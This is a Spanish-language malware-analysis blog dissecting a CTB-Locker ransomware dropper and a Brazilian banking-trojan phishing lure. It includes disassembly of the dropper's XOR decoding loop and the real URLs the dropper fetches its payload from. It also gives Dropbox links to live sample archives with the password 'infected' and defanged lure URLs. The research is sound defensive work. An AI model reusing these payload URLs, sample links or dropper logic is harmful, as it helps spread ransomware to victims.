<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017CE |. C645 F9 D5 MOV BYTE PTR SS:[EBP-7],0D5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017D2 |. C645 FA E8 MOV BYTE PTR SS:[EBP-6],0E8</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017D6 |. C645 FB 28 MOV BYTE PTR SS:[EBP-5],28</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017DA |. C645 FC EB MOV BYTE PTR SS:[EBP-4],0EB</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017DE |. C645 FD 4B MOV BYTE PTR SS:[EBP-3],4B</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017E2 |. C645 FE A5 MOV BYTE PTR SS:[EBP-2],0A5</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017E6 |. C645 FF DA MOV BYTE PTR SS:[EBP-1],0DA</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017EA |. 395D 0C CMP DWORD PTR SS:[EBP+C],EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017ED |. 76 26 JBE SHORT Dumped.00401815</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017EF |. 56 PUSH ESI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F0 |> 8B45 08 /MOV EAX,DWORD PTR SS:[EBP+8]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F3 |. 8D3403 |LEA ESI,DWORD PTR DS:[EBX+EAX]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F6 |. 8A0E |MOV CL,BYTE PTR DS:[ESI]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017F8 |. 8D543D F0 |LEA EDX,DWORD PTR SS:[EBP+EDI-10]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017FC |. 8A02 |MOV AL,BYTE PTR DS:[EDX]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004017FE |. 32C8 |XOR CL,AL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401800 |. 32C1 |XOR AL,CL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401802 |. 47 |INC EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401803 |. 880E |MOV BYTE PTR DS:[ESI],CL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401805 |. 8802 |MOV BYTE PTR DS:[EDX],AL</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401807 |. 83FF 10 |CMP EDI,10</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180A |. 75 02 |JNZ SHORT Dumped.0040180E</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180C |. 33FF |XOR EDI,EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180E |> 43 |INC EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040180F |. 3B5D 0C |CMP EBX,DWORD PTR SS:[EBP+C]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401812 |.^72 DC \JB SHORT Dumped.004017F0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401814 |. 5E POP ESI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401815 |> 5F POP EDI</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401816 |. 5B POP EBX</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401817 |. C9 LEAVE</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401818 \. C3 RETN</span><br />
<div>
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_QNSoFtrC4Ctm7K9CGEs55TGzSYeGYvklQS4HTORGr7gnzzrVtOliQZKbFw_Nmj52JwCOdyQUVxaMo6xvBirCy3PzVwOwcdDUiC6HcPeeOeXN4tDvKkhn2ijCgyCuZOs-RfrB-z5BQY0/s1600/05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_QNSoFtrC4Ctm7K9CGEs55TGzSYeGYvklQS4HTORGr7gnzzrVtOliQZKbFw_Nmj52JwCOdyQUVxaMo6xvBirCy3PzVwOwcdDUiC6HcPeeOeXN4tDvKkhn2ijCgyCuZOs-RfrB-z5BQY0/s1600/05.png" height="438" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Dejamos correr un poco mas la rutina...</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKdFUglXQgEB7AiJ_DHVrbG1xdheYx3LvNWNQ4aBsjKjbRdLa6O_u19BxB0L9GR9hmJtruW9Ox70C1hm4uHYSbuhD1N5WUanZNv9Uqs4u_Hj9OyNkBiLFXQYqGd3b91gXSEKnsXxgA8zg/s1600/07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKdFUglXQgEB7AiJ_DHVrbG1xdheYx3LvNWNQ4aBsjKjbRdLa6O_u19BxB0L9GR9hmJtruW9Ox70C1hm4uHYSbuhD1N5WUanZNv9Uqs4u_Hj9OyNkBiLFXQYqGd3b91gXSEKnsXxgA8zg/s1600/07.png" height="430" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">El ejecutable es escrito en C:\Windows\Temp</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioo3rE2tPUgV87_g_8PMjuED0Zt_PpVIPAzc3PY4wJa-idgKKfKzMiGeKtBIWJZeLjv-fT_aSoFlaxUcohVp6Adx_N1222_QjQb9cvjk943LugEFzUDqhsnmQNuyZdtHGRPFwLrRj4dPY/s1600/08-b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioo3rE2tPUgV87_g_8PMjuED0Zt_PpVIPAzc3PY4wJa-idgKKfKzMiGeKtBIWJZeLjv-fT_aSoFlaxUcohVp6Adx_N1222_QjQb9cvjk943LugEFzUDqhsnmQNuyZdtHGRPFwLrRj4dPY/s1600/08-b.png" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Y Luego Ejecutado.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieJy4-GKfyKaZMF0G4Dr0jlDU1oplRSclmYToAGTg18otdOMXO4KQUmLFiBxxQIawDVeyzfR1zOurkWx9y2n-3VwsOl2FTOxV97ZsbWMvxbvLTbOAd1xJmrgP2Rc_gVAz4kuBTmEUFzc/s1600/09-b.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieJy4-GKfyKaZMF0G4Dr0jlDU1oplRSclmYToAGTg18otdOMXO4KQUmLFiBxxQIawDVeyzfR1zOurkWx9y2n-3VwsOl2FTOxV97ZsbWMvxbvLTbOAd1xJmrgP2Rc_gVAz4kuBTmEUFzc/s1600/09-b.png" height="124" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Mensaje de CTB-Locker una vez ejecutado y codificados los archivos de la victima.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQBReZNhzZWG5x6qN_ETx4myMlSCP3_Tm9tpkRgISP6UKwcYhj75SiASLDqXMNyAXAyFxfidtwWYgrGJdr1yFqnsZlqfoFmOCykajDVu61YLDg5gpgXTJ42uh5fO61iJjxeEwkMPha01s/s1600/02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQBReZNhzZWG5x6qN_ETx4myMlSCP3_Tm9tpkRgISP6UKwcYhj75SiASLDqXMNyAXAyFxfidtwWYgrGJdr1yFqnsZlqfoFmOCykajDVu61YLDg5gpgXTJ42uh5fO61iJjxeEwkMPha01s/s1600/02.png" height="480" width="640" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Muestras con dumps: https://www.dropbox.com/s/2mhund40f6hqula/ctb-locker-21-01-15.rar?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Password = infected</span><br />
<br />
<br />
<br />
<br />
<br />
<b>28/01/2015 - <span style="font-family: Arial, Helvetica, sans-serif;">Nueva campaña </span></b><br />
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<span style="font-family: Arial, Helvetica, sans-serif;">Se enviaron nuevos correos en castellano desde cuentas comprometidas.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwK51fLhOzE5Vp14LWRirmXjYjL6xmb5PKERX-WvQIhmBZoK8bfTBI_WI5I4HTmrfo61F4BvufuUIjO97G_wPWaRZON7tGn8ena-I5-G8_gwXtZ1UmBnQgxitKyMQOTx_1_rRbSfk3cA/s1600/Clipboard02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwK51fLhOzE5Vp14LWRirmXjYjL6xmb5PKERX-WvQIhmBZoK8bfTBI_WI5I4HTmrfo61F4BvufuUIjO97G_wPWaRZON7tGn8ena-I5-G8_gwXtZ1UmBnQgxitKyMQOTx_1_rRbSfk3cA/s1600/Clipboard02.jpg" height="210" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Archivo adjunto CAB con un ejecutable .SCR</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Y9TJ2y5Gr19HYKNCUlzHns-JhSZxAEs-KRUNM12cLTTJ5vH_AGQdx1OQOnIzEqWGS2uMZDhhEhWWgrTLKio26JbybcWOiLOIbr1gGtmQfnytS_4BD2u7AFPzFcirWZnqUjap1LO3V1I/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_Y9TJ2y5Gr19HYKNCUlzHns-JhSZxAEs-KRUNM12cLTTJ5vH_AGQdx1OQOnIzEqWGS2uMZDhhEhWWgrTLKio26JbybcWOiLOIbr1gGtmQfnytS_4BD2u7AFPzFcirWZnqUjap1LO3V1I/s1600/Clipboard01.jpg" height="267" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. con un indice de detecciones casi nulo 2/57</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBpyFflHZTdxd4r7vXocqSfL9NSXNpQWMPKT7s4Kcz-72ye5Om_rIp3F-6-b6kJ6N7l1rGeeoW9U-P4NJQiaPLOqNGIdrgAM-wUONZoPYvpkG9_XDHWWjVCTWPdbSDBe_YfjTsJrWXz0/s1600/vt01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBpyFflHZTdxd4r7vXocqSfL9NSXNpQWMPKT7s4Kcz-72ye5Om_rIp3F-6-b6kJ6N7l1rGeeoW9U-P4NJQiaPLOqNGIdrgAM-wUONZoPYvpkG9_XDHWWjVCTWPdbSDBe_YfjTsJrWXz0/s1600/vt01.jpg" height="110" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"> Sitos de donde es descargado el CTB-Locker por el Dropper (https)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014D6 MOV DWORD PTR SS:[EBP-40],Dumped.0040106 UNICODE "joefel.com/easyscripts/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014DD MOV DWORD PTR SS:[EBP-38],Dumped.004010B UNICODE "m-a-metare.fr/media/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014E4 MOV DWORD PTR SS:[EBP-30],Dumped.004010F UNICODE "ourtrainingacademy.com/LeadingRE/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014EB MOV DWORD PTR SS:[EBP-28],Dumped.0040115 UNICODE "locamat-antilles.com/memo/sancho.tar.gz"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014F2 MOV DWORD PTR SS:[EBP-20],Dumped.004011A UNICODE "thomasottogalli.com/webtest/sancho.tar.gz"</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">004014F9 MOV DWORD PTR SS:[EBP-18],Dumped.0040120 UNICODE "cds-chartreuse.fr/locales/sancho.tar.gz"</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrTIqYMGwoss6d3MZx91ziF-Xsecla5I1lESf-l0ZNVxw8gPSTYQTCkamBVh2zVkHAxWoj3YVto1jRiucsFcAz-LGAWTd8k6wvn8q1E-3kfRdMw_nPTiOyat2on_ei65KrUIbiHpdVX-k/s1600/Captura+de+pantalla+de+2015-01-28+10_07_43.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrTIqYMGwoss6d3MZx91ziF-Xsecla5I1lESf-l0ZNVxw8gPSTYQTCkamBVh2zVkHAxWoj3YVto1jRiucsFcAz-LGAWTd8k6wvn8q1E-3kfRdMw_nPTiOyat2on_ei65KrUIbiHpdVX-k/s1600/Captura+de+pantalla+de+2015-01-28+10_07_43.png" height="124" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en V.T. del payload (ctb-Locker)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM37GdXuqrrH1k-m0aQoQ2bbhurSPUtBmbpRS4ZF0fK0PCmxvIFLafc917GdUKQ98b-j3QYwdogGMS0vg8MhglHWMNiD9bxeRyfhE_IJsk5ARND8_0Uf7U79L7RaUgfPIKsMEp-7HE258/s1600/vt02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM37GdXuqrrH1k-m0aQoQ2bbhurSPUtBmbpRS4ZF0fK0PCmxvIFLafc917GdUKQ98b-j3QYwdogGMS0vg8MhglHWMNiD9bxeRyfhE_IJsk5ARND8_0Uf7U79L7RaUgfPIKsMEp-7HE258/s1600/vt02.jpg" height="81" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<table class="table table-striped" id="antivirus-results" style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 20px; margin-bottom: 20px; max-width: 100%; width: 940px;"><thead>
<tr style="border: 0px;"><th class="header headerSortDown vt-width-30" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; padding: 8px; vertical-align: bottom; width: 300px;">Antivirus</th><th class="header" id="results-header" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; cursor: pointer; padding: 8px; vertical-align: bottom;">Result</th><th class="header" style="border-bottom-color: rgb(221, 221, 221); border-bottom-style: solid; border-bottom-width: 1px; border-top-width: 0px; padding: 8px; vertical-align: bottom;">Update</th></tr>
</thead><tbody>
<tr style="border: 0px;"><td class="ltr" style="background-color: #f9f9f9; border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">McAfee-GW-Edition</td><td class="ltr text-red" style="background-color: #f9f9f9; border: 0px; color: rgb(180, 12, 26) !important; direction: ltr !important; padding: 8px; vertical-align: top;">BehavesLike.Win32.Backdoor.bc</td><td class="ltr" style="background-color: #f9f9f9; border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">20150128</td></tr>
<tr style="border: 0px;"><td class="ltr" style="border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">Qihoo-360</td><td class="ltr text-red" style="border: 0px; color: rgb(180, 12, 26) !important; direction: ltr !important; padding: 8px; vertical-align: top;">HEUR/QVM20.1.Malware.Gen</td><td class="ltr" style="border: 0px; direction: ltr !important; padding: 8px; vertical-align: top;">20150128<br />
<br /></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Mensaje del Ransomware pidiendo rescate por los archivos cifrados.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFfj3U7Cv6gymnCqNkg3kPvWievAYF8hIHZO9IO3YbuZEFcO_ZIxmMuk-1KPQveVteJFIKuUtz1NDwjSqAiSdPO4PzzmKelZV7wTvU1DVqhPcqxaOUCEXzMJJl83vjOdbcZXcdysKhg-M/s1600/Captura+de+pantalla+de+2015-01-28+10_30_54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFfj3U7Cv6gymnCqNkg3kPvWievAYF8hIHZO9IO3YbuZEFcO_ZIxmMuk-1KPQveVteJFIKuUtz1NDwjSqAiSdPO4PzzmKelZV7wTvU1DVqhPcqxaOUCEXzMJJl83vjOdbcZXcdysKhg-M/s1600/Captura+de+pantalla+de+2015-01-28+10_30_54.png" height="229" width="320" /></a></div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b>
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Solicitud de pago 2.5 BTC aproximadamente U$s 625 para decifrar los archivos "secuestrados".</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_v7FOHlvRH7onscM1LfF-7n5h94pDvxzhb7jb2WpYDTodlzGMm5elPEygA1raFa84nZpz4MuQyNfX568q235jRLrjN_FF8WWoH_Z7e5kB5plCWYm2aKaVcxn0NdFQzPi3QYawz6_qxg/s1600/Captura+de+pantalla+de+2015-01-29+12_34_14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR_v7FOHlvRH7onscM1LfF-7n5h94pDvxzhb7jb2WpYDTodlzGMm5elPEygA1raFa84nZpz4MuQyNfX568q235jRLrjN_FF8WWoH_Z7e5kB5plCWYm2aKaVcxn0NdFQzPi3QYawz6_qxg/s1600/Captura+de+pantalla+de+2015-01-29+12_34_14.png" height="236" width="320" /></a></div>
<br />
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Muestras: https://www.dropbox.com/s/dk9eyjpt04y4k3r/CTB-Loker%2028-01-15.zip?dl=0</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Password = infected</span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">@Dkavalanche 2015</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-20166026623923743042014-11-27T08:01:00.002-08:002014-11-27T08:01:53.915-08:00<span style="background-color: #fefdfa;"><b><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Falsa Intimación :</span><span style="line-height: 18.2000007629395px;"> </span></span></b></span><span style="color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; line-height: 29.9904003143311px;">Intimacao de n. 9743872. O MINISTERIO PUBLICO FEDERAL</span><br />
<span style="background-color: #fefdfa; color: #333333; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2000007629395px;"><b><br /></b></span><span style="background-color: #fefdfa;"><span style="color: #333333; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 13px; line-height: 18.2000007629395px;">Hoy les traigo una amenaza que ataca a varias entidades bancarias de Brasil, mediante ingeniería social apelan a que desprevenidos descarguen una supuesta intimación del ministerio publico federal de Brasil. </span></span></span><br style="background-color: #fefdfa; color: #333333; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 18.2000007629395px;" /><br />
<h2 class="rmSubject" style="background-color: #fefdfa; border-bottom-color: transparent; border-bottom-style: solid; border-bottom-width: 1px; color: #444444; font-family: 'Segoe UI Light', 'Segoe UI Web Light', 'Segoe UI Web Regular', 'Segoe UI', 'Segoe UI Symbol', HelveticaNeue-Light, 'Helvetica Neue', Arial, sans-serif; font-size: 21px; font-stretch: normal; font-weight: normal; line-height: 29.9904003143311px; margin: 0px 0px 13px; padding: 2px 0px 0.5em; position: relative; text-align: center;">
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;">PROCEDIMENTO INVESTIGATÓRIO N.º 33781M. </strong></h2>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFD9mK9tZzMQCcyiAjX4Pg0YIoFya7KREwU_XM4pEsPeK12KYE4pkfCRw5xrgWgF48yP8wDJjVdXas9uAk6qihmypmzvEu3vguepgBjm9VrZYb3Ki0xMHMBxKFNStC04SWeAyxe9WdDM/s1600/01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUFD9mK9tZzMQCcyiAjX4Pg0YIoFya7KREwU_XM4pEsPeK12KYE4pkfCRw5xrgWgF48yP8wDJjVdXas9uAk6qihmypmzvEu3vguepgBjm9VrZYb3Ki0xMHMBxKFNStC04SWeAyxe9WdDM/s1600/01.jpg" height="400" width="370" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">El link descarga un zip que en su interior contiene un CPL.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hxxp:// ecole.saintlumine.free.fr/ecolesaintlu/images/Federal. php</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">hxxp:// w477408.blob4.ge.tt/streams/73TicN52/Intimacao-Federal. zip</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6C4qW9ZyDZweP6fstjdwx6XhHLs9I7ttchf4mEffxht_ZQF5naJvXClmwLmWr-P15bqs0ywvaI4UxseT6MJjXMUHEsurhPvetwM1eMRW18ks8pMRTADxlvlzQLmHHYkb_9emG6K51GLI/s1600/02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6C4qW9ZyDZweP6fstjdwx6XhHLs9I7ttchf4mEffxht_ZQF5naJvXClmwLmWr-P15bqs0ywvaI4UxseT6MJjXMUHEsurhPvetwM1eMRW18ks8pMRTADxlvlzQLmHHYkb_9emG6K51GLI/s1600/02.jpg" height="234" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analisis en Virus Total con un indice bajo en detecciones.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE_4K8wkzJDfkRW5ekEiZRSNgYfIA6lYiiiTdqkhejUdsaH8AhpTo9X90VLbOnn5RuQO3sCuKLzg6LXip6Z0ej4WqGSLU14hsoxPZz3WlSkGX4oZBd7WnaxZueMLTNX-SdGjZWwOKml8w/s1600/vt01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjE_4K8wkzJDfkRW5ekEiZRSNgYfIA6lYiiiTdqkhejUdsaH8AhpTo9X90VLbOnn5RuQO3sCuKLzg6LXip6Z0ej4WqGSLU14hsoxPZz3WlSkGX4oZBd7WnaxZueMLTNX-SdGjZWwOKml8w/s1600/vt01.jpg" height="94" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div>
<strong style="background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; line-height: normal; text-align: start;"><br /></strong></div>
<div>
<span style="background-color: white; text-align: start;"><div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
0049CDB4 <ansistring> 'olepro32.dll'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
0049E440 <ansistring> 'ControlData'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0B94 <ansistring> 'sejafeliz02'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
004A0BA8 <ansistring> '\\Adobe.zip'</ansistring></div>
<div style="font-family: 'Courier New', Courier, monospace; font-size: small;">
